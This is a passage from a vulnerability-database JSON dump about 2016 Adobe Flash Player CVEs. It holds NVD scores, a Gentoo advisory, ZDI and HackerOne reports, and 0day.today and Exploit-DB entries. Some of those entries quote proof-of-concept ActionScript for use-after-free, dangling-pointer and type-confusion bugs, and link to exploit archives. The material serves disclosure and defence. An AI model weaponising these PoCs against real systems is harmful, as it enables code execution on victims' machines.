CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0967", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0967"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0967", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0993", "CVE-2016-0992", "CVE-2016-1000", "CVE-2016-0996", "CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0987", "CVE-2016-0997", "CVE-2016-0963", "CVE-2016-0962", "CVE-2016-1002", "CVE-2016-0994", "CVE-2016-0998", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0990", "CVE-2016-0969", "CVE-2016-0999", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0960", "CVE-2016-0986", "CVE-2016-0966", "CVE-2016-1001", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0995", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-1005", "CVE-2016-0988", "CVE-2016-0977", "CVE-2016-0961", "CVE-2016-1010", "CVE-2016-0989", "CVE-2016-0985", "CVE-2016-0991"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"www-plugins/adobe-flash-11.2.202.577\"", "edition": 1, "modified": "2016-03-12T00:00:00", "published": "2016-03-12T00:00:00", "id": "GLSA-201603-07", "href": "https://security.gentoo.org/glsa/201603-07", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-27T01:14:58", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0964"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25829", "id": "1337DAY-ID-25829", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=609\r\n \r\nThe attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25829"}, {"lastseen": "2018-01-09T15:06:07", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - ATF Processing Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0971"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25831", "id": "1337DAY-ID-25831", "sourceData": "Source: 
https://code.google.com/p/google-security-research/issues/detail?id=635\r\n \r\nThe attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25831", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-11T21:57:58", "edition": 1, "description": "Exploit for multiple platform in category dos / poc", "published": "2016-02-17T00:00:00", "title": "Adobe Flash - LoadVars.decode Use-After-Free", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0974"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25833", "id": "1337DAY-ID-25833", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=667\r\n \r\nThere is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:\r\n \r\nvar lv = new LoadVars();\r\nvar f = lv.decode;\r\nvar tf = this.createTextField(\"tf\",1, 2, 3, 4, 5);\r\ntf.natalie = \"not test\";\r\ntf.watch(\"natalie\", func);\r\nf.call(tf, \"natalie=test&bob=1\");\r\ntrace(tf.natalie);\r\n \r\n \r\nfunction func(){\r\n \r\n trace(\"here\");\r\n tf.removeTextField(); \r\n return \"test\";\r\n \r\n }\r\n \r\n \r\nA sample swf and fla are attached. 
This issue was reproduced in Chrome on 64-bit Ubuntu.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/25833", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-04T23:19:57", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - H264 File Stack Corruption", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0967"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25830", "id": "1337DAY-ID-25830", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=633\r\n \r\nThe attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25830"}, {"lastseen": "2018-04-09T03:43:13", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - Out-of-Bounds Image Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0965"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25836", "id": "1337DAY-ID-25836", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=630\r\n \r\nThe attached file can cause an out-of-bounds read of an image. While the bits of the image are null, the width, height and other values can make it a valid pointer. 
\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/25836", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T17:29:48", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0984"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25834", "id": "1337DAY-ID-25834", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=698\r\n \r\nThere is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. A minimal PoC is as follows:\r\n \r\n var s = new Sound();\r\n var b = new ByteArray();\r\n for( var i = 0; i < 1600; i++){\r\n b.writeByte(1);\r\n }\r\n b.position = 0;\r\n s.loadPCMFromByteArray(b, 100, \"float\", false, 2.0);\r\n var c = new ByteArray();\r\n for(var i = 0; i < 2; i++){\r\n c.writeByte(1); \r\n }\r\n c.position = 0;\r\n try{\r\n s.loadPCMFromByteArray(c, 1, \"float\", false, 2.0);\r\n }catch(e:Error){ \r\n trace(e.message);\r\n }\r\n \r\n var d = new ByteArray();\r\n s.extract(d, 1, 0);\r\n \r\nThe PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes an exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. 
The sound.extract method reads directly out of the location the dangling pointer points to.\r\n \r\nA full PoC and swf are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25834"}, {"lastseen": "2018-01-01T07:17:11", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - textfield Constructor Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0985"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25835", "id": "1337DAY-ID-25835", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=701\r\n \r\nThere is a type confusion vulnerability in the TextField constructor in AS3. When a TextField is constructed, a generic backing object is created and reused when subsequent TextField objects are created. However, if an object with the same ID has already been created in the SWF, it can be of the wrong type. The constructor contains a check for this situation, though, and throws an exception and sets a flag to shut down the player if this occurs. 
The backing object is then set to be of type TextField to avoid any modifications that have been made on it by the constructor from causing problems if it is used as an object of its original type elsewhere in the player.\r\n \r\nHowever, if the exception thrown by the constructor is caught, the exception handler can create another TextField object, and since the type of the generic backing object has been changed, an object of the wrong type is now backing the TextField, which makes it possible to set the pointers in the object to integer values selected by the attacker.\r\n \r\nThe PoC swf for this issue needs to be created by hand. The original swf code is:\r\n \r\ntry{\r\n \r\n var t = new TextField();\r\n \r\n} catch(e:Error){\r\n \r\n var t2 = new TextField();\r\n t2.gridFitType;\r\n \r\n}\r\n \r\nThen in the swf, a backing object of a different type with ID 0xfff9 is created, which causes the first constructor call to fail, and the second to cause type confusion.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25835", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-21T18:25:37", "description": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow. CVE-2016-0964. 
Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0964"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39467", "href": "https://www.exploit-db.com/exploits/39467/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=609\r\n\r\nThe attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39467/"}, {"lastseen": "2016-02-21T18:25:23", "description": "Adobe Flash - ATF Processing Heap Overflow. CVE-2016-0971. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - ATF Processing Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0971"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39465", "href": "https://www.exploit-db.com/exploits/39465/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=635\r\n\r\nThe attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39465/"}, {"lastseen": "2016-02-21T18:25:15", "description": "Adobe Flash - LoadVars.decode Use-After-Free. CVE-2016-0974. 
Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - LoadVars.decode Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0974"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39463", "href": "https://www.exploit-db.com/exploits/39463/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=667\r\n\r\nThere is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:\r\n\r\nvar lv = new LoadVars();\r\nvar f = lv.decode;\r\nvar tf = this.createTextField(\"tf\",1, 2, 3, 4, 5);\r\ntf.natalie = \"not test\";\r\ntf.watch(\"natalie\", func);\r\nf.call(tf, \"natalie=test&bob=1\");\r\ntrace(tf.natalie);\r\n\r\n\r\nfunction func(){\r\n\t\r\n\ttrace(\"here\");\r\n\ttf.removeTextField();\t\r\n\treturn \"test\";\r\n\r\n\t}\r\n\t\r\n\r\nA sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39463/"}, {"lastseen": "2016-02-21T18:25:33", "description": "Adobe Flash - H264 File Stack Corruption. CVE-2016-0967. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - H264 File Stack Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0967"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39466", "href": "https://www.exploit-db.com/exploits/39466/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=633\r\n\r\nThe attached flv file causes stack corruption when loaded into Flash. 
To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39466/"}, {"lastseen": "2016-02-21T18:24:56", "description": "Adobe Flash - Out-of-Bounds Image Read. CVE-2016-0965. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - Out-of-Bounds Image Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0965"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39460", "href": "https://www.exploit-db.com/exploits/39460/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=630\r\n\r\nThe attached file can cause an out-of-bounds read of an image. While the bits of the image are null, the width, height and other values can make it a valid pointer. \r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39460/"}, {"lastseen": "2016-02-21T18:25:10", "description": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer. CVE-2016-0984. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0984"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39462", "href": "https://www.exploit-db.com/exploits/39462/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=698\r\n\r\nThere is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. 
A minimal PoC is as follows:\r\n\r\n\tvar s = new Sound();\r\n\tvar b = new ByteArray();\r\n\tfor( var i = 0; i < 1600; i++){\r\n\t\tb.writeByte(1);\r\n\t}\r\n\tb.position = 0;\r\n\ts.loadPCMFromByteArray(b, 100, \"float\", false, 2.0);\r\n\tvar c = new ByteArray();\r\n\tfor(var i = 0; i < 2; i++){\r\n\t\t\tc.writeByte(1);\t\r\n\t}\r\n\tc.position = 0;\r\n\ttry{\r\n\t\ts.loadPCMFromByteArray(c, 1, \"float\", false, 2.0);\r\n\t}catch(e:Error){\t\t\r\n\t\ttrace(e.message);\r\n\t}\r\n\t\t\t\r\n\tvar d = new ByteArray();\r\n\ts.extract(d, 1, 0);\r\n\r\nThe PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes an exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. The sound.extract method reads directly out of the location the dangling pointer points to.\r\n\r\nA full PoC and swf are attached.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39462/"}, {"lastseen": "2016-02-21T18:25:01", "description": "Adobe Flash -TextField Constructor Type Confusion. CVE-2016-0985. 
Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash -TextField Constructor Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0985"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39461", "href": "https://www.exploit-db.com/exploits/39461/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=701\r\n\r\nThere is a type confusion vulnerability in the TextField constructor in AS3. When a TextField is constructed, a generic backing object is created and reused when subsequent TextField objects are created. However, if an object with the same ID has already been created in the SWF, it can be of the wrong type. The constructor contains a check for this situation, though, and throws an exception and sets a flag to shut down the player if this occurs. The backing object is then set to be of type TextField to avoid any modifications that have been made on it by the constructor from causing problems if it is used as an object of its original type elsewhere in the player.\r\n\r\nHowever, if the exception thrown by the constructor is caught, the exception handler can create another TextField object, and since the type of the generic backing object has been changed, an object of the wrong type is now backing the TextField, which makes it possible to set the pointers in the object to integer values selected by the attacker.\r\n\r\nThe PoC swf for this issue needs to be created by hand. 
The original swf code is:\r\n\r\ntry{\r\n\r\n var t = new TextField();\r\n\r\n} catch(e:Error){\r\n\r\n var t2 = new TextField();\r\n t2.gridFitType;\r\n\r\n}\r\n\r\nThen in the swf, a backing object of a different type with ID 0xfff9 is created, which causes the first constructor call to fail, and the second to cause type confusion.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39461/"}], "zdi": [{"lastseen": "2020-06-22T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-0975"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of instanceof. The issue lies in the failure to safely hold a reference to arguments during execution of the function. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.", "modified": "2016-06-22T00:00:00", "published": "2016-02-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-16-160/", "id": "ZDI-16-160", "title": "Adobe Flash instanceof Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2016-0973"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of URLRequest objects. 
By calling URLLoader.load on a URLRequest object, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.", "modified": "2016-06-22T00:00:00", "published": "2016-02-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-16-161/", "id": "ZDI-16-161", "title": "Adobe Flash URLRequest Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2016-0982"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Use-After-Free. \n------------------------------------------------------------------\nII. Description\nIf the ASnative(900,1) is invoked with MovieClip instance and getter properties associated with swfRoot where the getter method includes a call to removeMovieClip(), the MovieClip instance is used after it is freed.\n\nLatest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nUse-After-Free\n------------------------------------------------------------------\nIV. 
Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned by Adobe as CVE-2016-0982\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html", "modified": "2019-11-12T09:43:04", "published": "2016-03-01T08:01:33", "id": "H1:119653", "href": "https://hackerone.com/reports/119653", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(900,1).call(MovieClip) Use-After-Free Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2016-0983"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Use-After-Free. \n------------------------------------------------------------------\nII. Description\nIf the ASnative(900,1) is invoked with TextField instance and getter properties associated with swfRoot where the getter method includes a call to removeTextField(), the TextField instance is used after it is freed.\n\nThe zip attachment contains the crash.swf and its source code.\nLatest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nUse-After-Free\n------------------------------------------------------------------\nIV. 
Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned by Adobe as CVE-2016-0983\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html", "modified": "2019-11-12T09:43:04", "published": "2016-03-01T08:03:36", "id": "H1:119655", "href": "https://hackerone.com/reports/119655", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(900,1).call(TextField) Use-After-Free Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 5000.0, "cvelist": ["CVE-2016-0981"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Memory Corruption. \n------------------------------------------------------------------\nII. Description\nWhen ASnative(101,10) is called with a MovieClip object pointer, Flash Player is crashed due to an invalid EIP value. Carefully crafted swf file may allow the attacker to hijack the EIP, leading to shellcode execution in the context of affected application. \n\nLatest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nMemory Corruption\n------------------------------------------------------------------\nIV. 
Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned as CVE-2016-0981 by Adobe.\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html\n", "modified": "2019-11-12T09:43:09", "published": "2016-03-01T07:57:50", "id": "H1:119652", "href": "https://hackerone.com/reports/119652", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(101,10) Memory Corruption Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-0984", "CVE-2016-0998"], "description": "Posted by Natalie Silvanovich, Mourner of Lost Exploits\n\nOver the past few months, Adobe has introduced a number of [changes](<https://blogs.adobe.com/security/tag/heap-isolation>) to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs discovered after the Isolated Heap was implemented to explore how it impacts their exploitability.\n\n# The Isolated Heap\n\nThe Flash heap, [MMgc](<https://developer.mozilla.org/en-US/docs/Archive/MMgc>), is a garbage collected heap that also supports unmanaged fixed allocations. In the past, there have been many exploits in the wild that used certain properties of the heap to aid exploitation. 
In particular, many [exploits](<https://0b3dcaf9-a-62cb3a1a-s-sites.googlegroups.com/site/zerodayresearch/smashing_the_heap_with_vector_Li.pdf?attachauth=ANoY7cqJuxIdzdr9r2FUBjPwrbRuEiRHkb93MO3MKyOJSXWISkoMK0Swma6ODx4OC1ZqzMxcQDI7MzSVSR9whu6tYH_DKIRxxRYPeuXC1fYVI6fz2VNVHUJnL4MxYX8emXsHaQ8Ec9etfNGff3KtUdw5X-QfZ7QtYs5b0fBFy5Z-MBXrxU9WZlFFXLkoCcrHeU0WVoj-OFNX_p6cqmkQgCLiHc8Wg6RQhnZu8N_9Nrl32jOuxqHfmT3INnoH33FWadmLL5uFMiCx&attredirects=0>) used the allocation properties of Vectors to gain read/write access to the entire Flash memory space via heap memory corruption bugs. Exploits that use other object types, such as ByteArray and BitmapData have also been seen in the wild.\n\nMMgc was originally implemented as a type and size bucketed allocator. When memory is requested, the allocator that is called depends on the type of memory that is needed. This is related to the garbage collection properties of the memory. If it is not garbage collected, the Fixed allocator is used, otherwise the Garbage-Collected (GC) allocator is used. Within the GC allocator, there are about eight subtypes of memory that can be allocated, related to whether the memory contains pointers and whether those pointers have custom finalizers or GC routines that need to be called. Within each type, the request is sorted by size, and the memory is allocated on a heap page for that size. Large requests are allocated on their own page.\n\nThe Isolated Heap introduces partitioning to the heap, essentially a third factor which determines where memory is allocated. There is separate memory for each partition, which 